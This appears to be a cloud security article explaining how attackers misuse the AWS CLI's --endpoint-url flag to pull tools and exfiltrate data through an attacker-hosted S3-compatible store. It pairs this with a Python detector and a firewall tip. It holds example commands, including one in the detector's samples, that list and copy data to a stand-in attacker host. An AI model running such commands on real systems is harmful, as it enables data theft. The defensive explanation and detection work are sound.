Article by Nick Frichette.

Download Tools and Exfiltrate Data with the AWS CLI

In an attempt to be stealthy, threat actors will often "live off the land", using tools and scripts already present on a host machine for purposes other than those they were intended for. This helps them avoid detection by blending in with their surroundings.

In AWS environments, it is common to find servers that have the AWS CLI installed (it is included by default in Amazon Linux). This makes it an excellent choice for adversaries to move data around, avoiding more commonly used tools like curl or Wget, which may be monitored for suspicious use.

As seen in the wild with the SCARLETEEL threat actor, the AWS CLI can be used to download and exfiltrate data via an attacker-hosted backend. You can host an S3-compatible object store such as MinIO and then use the --endpoint-url flag to point the CLI at that service. This makes it easy to download tools, exfiltrate compromised data and more.

$ aws s3 ls --endpoint-url https://attacker.s3.store
2023-07-13 02:06:30 criminalbucket
2023-07-13 22:01:36 exfiltrated-data
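From the defender's side, the tell in the listing above is an aws CLI invocation whose --endpoint-url does not point at an AWS-operated endpoint. The following is an added detection example, not code from the article or from any AWS tooling: it parses captured command lines (for instance from auditd execve records or shell history), pulls out the --endpoint-url value in either of its two spellings, and flags hosts outside the amazonaws.com suffixes. The sample command lines and the 203.0.113.5 MinIO-style endpoint are constructed for the example; the attacker.s3.store host is the one shown on this page.

```python
import shlex
from urllib.parse import urlparse

# Hostname suffixes of AWS-operated endpoints. An --endpoint-url whose
# host is outside these is not an AWS service and deserves a closer look.
AWS_ENDPOINT_SUFFIXES = (".amazonaws.com", ".amazonaws.com.cn")


def extract_endpoint_url(cmdline):
    """Return the --endpoint-url value of an aws CLI command line, or None.

    Accepts both '--endpoint-url URL' and '--endpoint-url=URL'. Lines that are
    not aws CLI invocations (or cannot be parsed as a shell command) yield None.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes: not a parseable command line
    # Match 'aws' whether or not it was invoked with a full path.
    if not argv or argv[0].rsplit("/", 1)[-1] != "aws":
        return None
    for i, arg in enumerate(argv):
        if arg == "--endpoint-url" and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--endpoint-url="):
            return arg.split("=", 1)[1]
    return None


def is_non_aws_endpoint(url):
    """True when the URL's host is not under an AWS endpoint suffix.

    A URL with no parseable host (or a bare IP address) is treated as
    non-AWS, since neither can be an AWS regional endpoint.
    """
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return True
    return not host.endswith(AWS_ENDPOINT_SUFFIXES)


def flag_suspicious(cmdlines):
    """Return (cmdline, endpoint_url) pairs for aws calls to non-AWS endpoints."""
    flagged = []
    for line in cmdlines:
        url = extract_endpoint_url(line)
        if url is not None and is_non_aws_endpoint(url):
            flagged.append((line, url))
    return flagged


# Constructed command lines standing in for a captured execve/history feed.
SAMPLE_CMDLINES = [
    "aws s3 ls",
    "aws s3 ls --endpoint-url https://s3.us-east-1.amazonaws.com",
    "aws s3 ls --endpoint-url https://attacker.s3.store",
    "/usr/bin/aws s3 cp ./report.tar.gz s3://exfiltrated-data/ --endpoint-url=https://attacker.s3.store",
    "aws s3 ls --endpoint-url http://203.0.113.5:9000",
    "curl https://example.org/",
]

if __name__ == "__main__":
    for cmd, url in flag_suspicious(SAMPLE_CMDLINES):
        print(f"non-AWS endpoint {url}: {cmd}")
```

Command-line matching is deliberately narrow: the CLI can also take its endpoint from configuration (the AWS_ENDPOINT_URL environment variable or an endpoint_url setting in the config file), so an egress control such as the firewall allowlist described in the tip below remains the more complete mitigation, with this kind of host-side check as a cheap second signal.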

Tip

As mentioned by Jesse Lepich, a layer 7 firewall like the AWS Network Firewall can be used to limit access to non-allowlisted domains.